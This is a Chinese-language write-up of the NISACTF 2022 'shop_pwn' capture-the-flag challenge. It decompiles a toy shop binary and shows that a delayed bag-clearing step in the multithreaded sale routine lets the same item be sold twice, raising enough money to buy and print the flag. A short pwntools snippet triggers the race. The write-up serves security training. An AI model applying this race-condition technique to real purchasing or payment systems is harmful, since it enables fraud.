[NISACTF 2022]shop_pwn wp

字数: 1087

题面

pthread_create多线程竞争
附件一个二进制包。

分析 & 利用

checksec 查看保护:

1
2
3
4
5
6
7
8
❯ pwn checksec pwn
[*] '/data/project/ctf-repo/pwn/nssctf/NISACTF_2022-shop_pwn/pwn'
    Arch:       amd64-64-little
    RELRO:      Partial RELRO
    Stack:      Canary found
    NX:         NX enabled
    PIE:        No PIE (0x400000)
    Stripped:   No

ida 静态分析:

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
int __fastcall __noreturn main(int argc, const char **argv, const char **envp)
{
  init(argc, argv, envp);
  game();
}

void init()
{
  int fd; // [rsp+Ch] [rbp-4h]

  fd = open("/flag", 0);
  read(fd, flag, 0x30u);
  close(fd);
  setbuf(_bss_start, 0);
  setbuf(stdin, 0);
  strcpy((char *)&dword_602138, "flag");
  dword_602150 = 7234928;
  strcpy((char *)&dword_602168, "wish");
  dword_602148 = 200;
  dword_602160 = 100;
  dword_602178 = 50;
  dword_60214C = 100;
  dword_602164 = 99;
  dword_60217C = 0;
}

void __noreturn game()
{
  int v0; // eax
  int i; // [rsp+Ch] [rbp-4h]

  while ( 1 )
  {
    while ( 1 )
    {
      puts("     Welcome to my shop     ");
      puts("+===========================+");
      puts("| No|        | Sell| Recycle|");
      puts("+===+========+=====+========+");
      for ( i = 0; i <= 15; ++i )
      {
        if ( *(_DWORD *)&gd[24 * i + 16] )
          printf(
            "| %d | %-4s   | %3d |   %3d  |\n",
            i,
            &gd[24 * i],
            *(_DWORD *)&gd[24 * i + 16],
            *(_DWORD *)&gd[24 * i + 20]);
      }
      puts("+===========================+");
      puts("1. look bags\n2. buy goods\n3. sale goods");
      printf("> ");
      v0 = read_int();
      if ( v0 != 2 )
        break;
      buy();
    }
    if ( v0 > 2 )
    {
      if ( v0 == 3 )
      {
        sale();
      }
      else
      {
        if ( v0 == 4 )
          exit(0);
LABEL_17:
        puts("Invalid!");
      }
    }
    else
    {
      if ( v0 != 1 )
        goto LABEL_17;
      look();
    }
  }
}

事实证明,main 的 init 函数也是要看的。
这里 init 打开了 /flag 文件将文件内容保存到 .bss 的 flag 标签下。

game 函数内就是一个买东西的系统。
有三种商品:flag、pen、wish,你的背包里只有一个 pen 和 100 元,flag 需要 200 元,尽管你卖掉了笔,也只有 199 元。

buy()

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
unsigned __int64 buy()
{
  int v1; // [rsp+Ch] [rbp-14h]
  pthread_t newthread; // [rsp+10h] [rbp-10h] BYREF
  unsigned __int64 v3; // [rsp+18h] [rbp-8h]

  v3 = __readfsqword(0x28u);
  printf("Which one?\n> ");
  v1 = read_int();
  if ( v1 == 1 || v1 == 2 || v1 == 3 )
  {
    if ( *(_DWORD *)&gd[24 * v1 + 16] <= money )
    {
      if ( v1 == 3 )
      {
        money -= dword_602178;
        puts("God bless you");
      }
      else
      {
        pthread_create(&newthread, 0, to_buy, (void *)v1);
        puts("Thank you for your patronage~");
      }
    }
    else
    {
      puts("Poor bastard!");
    }
  }
  return __readfsqword(0x28u) ^ v3;
}

购买选择商品,如果你买的商品是 pen 或者 flag 会通过 pthread_create 创建新线程跑 to_buy 。

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
unsigned __int64 __fastcall to_buy(void *a1)
{
  unsigned __int64 result; // rax
  int i; // [rsp+10h] [rbp-4h]

  result = (unsigned int)(money - *(_DWORD *)&gd[24 * (int)a1 + 16]);
  money -= *(_DWORD *)&gd[24 * (int)a1 + 16];
  for ( i = 0; i <= 15; ++i )
  {
    result = (unsigned int)bags[i];
    if ( !(_DWORD)result )
    {
      result = i;
      bags[i] = (int)a1;
      return result;
    }
  }
  return result;
}

to_buy 没什么新奇的。

sale()

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
20
unsigned __int64 sale()
{
  int v1; // [rsp+Ch] [rbp-14h]
  pthread_t newthread; // [rsp+10h] [rbp-10h] BYREF
  unsigned __int64 v3; // [rsp+18h] [rbp-8h]

  v3 = __readfsqword(0x28u);
  printf("Which one?\n> ");
  v1 = read_int();
  if ( bags[v1] )
  {
    pthread_create(&newthread, 0, to_sale, (void *)v1);
    puts("Fair prices!");
  }
  else
  {
    puts("R U kidding me?");
  }
  return __readfsqword(0x28u) ^ v3;
}

卖出东西,通过 pthread_create 创建新线程运行 to_sale 。

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
void *__fastcall to_sale(void *a1)
{
  int v1; // eax
  void *result; // rax

  v1 = bags[(int)a1];
  if ( v1 == 1 )
  {
    money += dword_60214C;
  }
  else
  {
    if ( v1 != 2 )
    {
      printf("Oops???");
      exit(0);
    }
    money += dword_602164;
  }
  usleep(50000u);
  result = (void *)(int)a1;
  bags[(int)a1] = 0;
  return result;
}

注意这里进程通过 usleep(50000u); 挂起 0.5 秒后才将背包相应位置置零。
利用这间隙实际可以引出竞争条件在极短的时间内同时卖出相同的东西抓住 timing ,因为 money 是在 usleep 之前增加的,所以可以达到所需的钱。

只需要写脚本:

1
2
3
4
io.sendline(b"3")
io.sendline(b"0")
io.sendline(b"3")
io.sendline(b"0")

剩下的工作可以手动完成,只需要购买 flag 查看背包。
因为查看背包如果是 flag 就会直接输出 bss 中的 flag 标签内容:

1
2
3
4
if ( v0 == 1 )
{
  printf("[%02d]: flag -> %s\n", i, flag);
}

所以很容易就拿到 flag。